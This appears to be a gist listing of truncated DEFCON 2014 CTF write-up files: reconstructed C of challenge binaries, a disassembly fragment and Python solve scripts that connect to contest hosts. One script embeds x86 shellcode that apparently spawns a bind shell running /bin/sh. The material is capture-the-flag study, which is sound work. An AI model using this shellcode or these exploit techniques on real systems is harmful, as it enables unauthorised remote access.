
potetisensei / sis.c
Created February 16, 2014 12:06
DEFCON Writeup incest
int main(int argc, char *argv[]) {
int p;
int netfd;
int filefd;
signal(SIGALRM, quitter);
alarm(0x0F);
netfd = atoi(argv[2]);
filefd = atoi(argv[1]);
potetisensei / penser.c
Last active August 29, 2015 13:56
DEFCON Writeup penser
/*
 * Reconstructed receive wrapper around a single recv() call.
 *
 * fd   - descriptor passed straight to recv()
 * buf  - destination buffer; a NULL pointer is rejected
 * size - number of bytes requested
 *
 * Returns -1 when buf is NULL, 0 when size is 0, and otherwise the result
 * of recv() narrowed to int (so -1 on a recv() error, or the byte count,
 * which may be smaller than size).
 *
 * NOTE(review): only size == 0 is special-cased. A negative size is passed
 * on to recv(), whose length parameter is size_t, so it becomes a very large
 * unsigned value. Nothing here checks size against the real capacity of buf;
 * callers have to guarantee that bound.
 */
int recv_fd(int fd, void *buf, int size) {
    if (!buf) {
        return -1;
    }
    if (!size) {
        return 0;
    }

    int received = recv(fd, buf, size, 0);
    return received;
}
int send_fd(int fd, void *buf, int size) {
int i = 0;
class ECCDecodeDataStream {
public:
uint var_4[0x20];
uint var_84;
uint var_88;
uint *var_8C;
uint var_90;
uint var_94;
uint var_98;
uint var_9C;
potetisensei / solve.py
Created March 28, 2014 05:08
DEFCON Writeup lena
from PIL import Image
from socket import *
from random import randint
from reedsolo import RSCodec
from struct import pack
shellcode = list("jfX\x99j\x01[RSj\x02\x89\xe1\xeb\x01\x90\xcd\x80[]\xbe\x80\xff\xff\xfe\xf7\xd6V\x90\xeb\x01\x90f\xbdiz\x0f\xcd\t\xddUCj\x10Q\xeb\x01\x90P\xb0f\x89\xe1\xcd\x80\x87\xd9[\xb0?\x90\xeb\x01\x90\xcd\x80Iy\xf5\xb0\x0bR\x90\x90\x90\x90\x90\xeb\x01\x90h//shh/bin\x89\xe3R\xeb\x01\x90S\xeb\xd0")
rs = RSCodec(17)
encoded_shellcode = ""
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
/* Reconstructed global integer; how it is read or written is not visible in
 * this excerpt. */
int lastrand;
/* Reconstructed global function pointer: returns void, parameter list left
 * unspecified.
 * NOTE(review): when auditing the full listing, confirm where this pointer is
 * assigned and where it is called. A writable function pointer in global data
 * turns any out-of-bounds write that reaches it into control over an indirect
 * call. */
void (*exit_func)();
void do_exit(int arg_0)
{
potetisensei / solve.py
Created May 19, 2014 13:16
DEFCON 2014 Writeup heap
from struct import pack
from socket import *
from pwn import process
chunk_data_list = [0x00000379,0x000004e8,0x00000421,0x00000489,0x00000421,0x00000429,0x00000391,0x00000379,0x00000341]
p = socket(AF_INET, SOCK_STREAM)
p.connect(("babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me", 4088))
#p = process("./heap")
potetisensei / memo.c
Created May 19, 2014 13:28
shitsco incomplete
int global_permission; /* reconstructed global int; the name suggests a privilege/permission flag, but its use is not visible in this excerpt - confirm against the full listing */
int sub_8048C30(int fd, char *buf, int size, char splitter) {
char tmp_buf[]; /* var_1D */
unsigned int ind = 0; /* register ebx */
if (size <= 0) return ind;
while (1) {
if (read(fd, tmp_buf, 1) <= 0) return -1;
potetisensei / sub_8049230.txt
Last active August 29, 2015 14:01
sub_8049230
.text:08049230 sub_8049230 proc near ; DATA XREF: .data:0804C270o
.text:08049230
.text:08049230 dest = dword ptr -4Ch
.text:08049230 src = dword ptr -48h
.text:08049230 n = dword ptr -44h
.text:08049230 var_40 = dword ptr -40h
.text:08049230 s2 = byte ptr -34h
.text:08049230 var_14 = dword ptr -14h
.text:08049230 var_10 = dword ptr -10h
.text:08049230 arg_0 = dword ptr 4
potetisensei / search.py
Created May 19, 2014 14:54
DEFCON 2014 Writeup shitsco
from struct import pack
from socket import *
from pwn import process
#p = process("shit")
p = socket(AF_INET, SOCK_STREAM)
p.connect(("shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me", 31337))
print p.recv(4096)
current = [ord(i) for i in ""] #[1] * 31 #list
potetisensei / retr.c
Created May 19, 2014 15:32
DEFCON 2014 Writeup sftp
void retr(char *arg0) {
char *haystack = arg0;
if (strstr(haystack, "flag")) {
char var_370[] = "-Nice try,"
write_my(var_370);
return ;
}
char *var_10 = ___xpg_basename(haystack);